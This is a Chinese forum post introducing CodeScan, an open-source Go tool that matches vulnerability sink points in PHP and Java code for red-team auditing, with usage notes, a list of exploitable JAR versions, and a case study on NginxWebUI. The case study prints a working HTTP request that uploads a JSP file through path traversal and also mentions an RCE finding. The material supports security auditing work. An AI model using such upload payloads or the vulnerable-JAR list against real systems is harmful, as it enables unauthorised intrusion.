开源:快速代码审计辅助工具,助力0day挖掘-攻击工具论坛-攻-棉花糖会员站

开源:快速代码审计辅助工具,助力0day挖掘

开发 – CodeScan

前言

这里是详细解释下CodeScan的用法,之前偏向于快速的代码审计,于是就写了一个这种快速匹配Sink点的工具,省的每次点点点搜搜索了,Python属实不优雅,就拿go写了一下,难度不大,练练手的项目,审计也不能一成不变的死磕,利用一些辅助工具会事半功倍,以下为完全详解,有任何问题和Bug可以Github上提Issue或者在Blog的关于页面找我的联系方式进行私聊,对师傅们有帮助的话可以点点Stars捏。

‍项目地址:

https://github.com/Zjackky/CodeScan

CodeScan

工具概述

该工具目的为对大多数不完整的代码以及依赖快速进行Sink点匹配来帮助红队完成快速代码审计,开发该工具的初衷是以Sink​到Source​的思路来开发,为了将所有可疑的Sink点匹配出来并且凭借第六感进行快速漏洞挖掘,并且该工具开发可扩展性强,成本极低,目前工具支持的语言有PHP,Java(JSP)

编译

功能

  1. 框架识别

  2. 涵盖大部分漏洞的Sink点的匹配(如图)

    image

  3. 可自定义定制化修改黑白名单内容

  4. 多模块化多语言化代码审计

  5. 进行融于鉴权代码的快速匹配抓取

  6. 根据Jar进行静态分析(默认分析)

  • mysqlconnect–>jdbc

  • Xstream –> xml/json

使用

高级用法

以下均以Java作为示例

高扩展性

很简单的自定义,如果需要自定义一些匹配规则,首先可以在这里加入

image

其次如果需要新增漏洞类型,只需要三步(这里以Sql为例)

  1. 新建SQL目录

  2. 定义一个方法叫 SqlCheck

  3. 写一个sqlcheck.txt(生成的文件名) + 你自定义的规则

  4. 最后在这里加入包名+方法名即可

image

 

扫描位置

在打一些闭源代码的时候经常就一个Jar或者Class,反编译的时候会把依赖进行一起反编译,所以为了避免扫描一些依赖的误报,在工具中自带的黑名单中会过滤掉如下黑名单的包名,需要自定义的时候可自行修改,位置在CommonVul/Rule/MatchPathRule.go

 
 

所以这也导致了一个问题,不能从顶层上直接扫描

image

请把CodeScan放在Net同级目录下扫描(否则会忽略掉直接一个Java目录)

-d​后面的参数尽量在/src/main/java​之后,比如这里就需要把CodeScan放到net​目录下开始扫描

 

过滤字符串(只写了JSP + PHP)

比如现在有一个代码百分百为鉴权代码在JSP中

此时可以用一下功能来进行快速获取未鉴权代码

 

此时会将不存在这个代码的文件都放到NoAuthDir​目录中,然后可以再扫一遍就可以立刻定位到存在未鉴权并且存在Sink点的函数文件了

静态分析依赖情况

只需要在CodeScan的目录下放入EvilJarList.txt即可匹配出来

EvilJarList.txt​ 内容为存在可打漏洞的Jar​,模版如下

fastjson-1.2.47.jar
resin-4.0.63.jar
jackson-core-2.13.3.jar
c3p0-0.9.5.2.jar
commons-beanutils-1.9.4.jar
commons-beanutils-1.9.3.jar
commons-beanutils-1.9.2.jar
commons-collections-3.2.1.jar
mysql-connector-java-8.0.17.jar
commons-collections4-4.0.jar
shiro-core-1.10.1.jar
aspectjweaver-1.9.5.jar
rome-1.0.jar
xstream-1.4.11.1.jar
sqlite-jdbc-3.8.9.jar
vaadin-server-7.7.14.jar
hessian-4.0.63.jar

 

 

TODO

  • 将结果从TXT转为Excel

  • Sink点继续完善

  • ASP

支持项目

  • 如果有师傅发现Bug或者有更好的建议请提issue感谢

  • 要是各位师傅通过本人的小工具挖到一些好洞记得回头点点Stars诶

详细使用文章(内附案例)

案例

这里就展示下一些简单的代码,只有自己用了才知道真香

NginxWebui

先框架分析为Spring

image

任意文件上传

工具扫描出结果为

image

有时候代码就是可以直接秒的,这里发现transferTo​ 这个sink点就在控制层

找到src/main/java/com/cym/controller/adminPage/MainController.java

image

image

这种名字可以进行跨目录上传

直接传即可上传成功

image

报文

POST /admiNPage/main/upload HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 0
Origin: http://localhost:8080
Referer: http://localhost:8080/adminPage/monitor
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A

------WebKitFormBoundarye8FPHsIAq9JN8j2A
Content-Disposition: form-data; name="file";filename="../3.jsp"
Content-Type: image/jpeg

<%out.print("test");%>
------WebKitFormBoundarye8FPHsIAq9JN8j2A--

image

RCE

image

直接去找了下控制层的代码

image

image

emmm这代码可真弱智,再去调用控制层的代码。。。

image

由于一些闭源代码不适合放,因此就拿个开源的nday来进行分析吧,其实原理懂了之后只是合适辅助罢了,但我看开源上都没有人写过,也是就造下轮子开源出来了

请登录后发表评论

    请登录后查看回复内容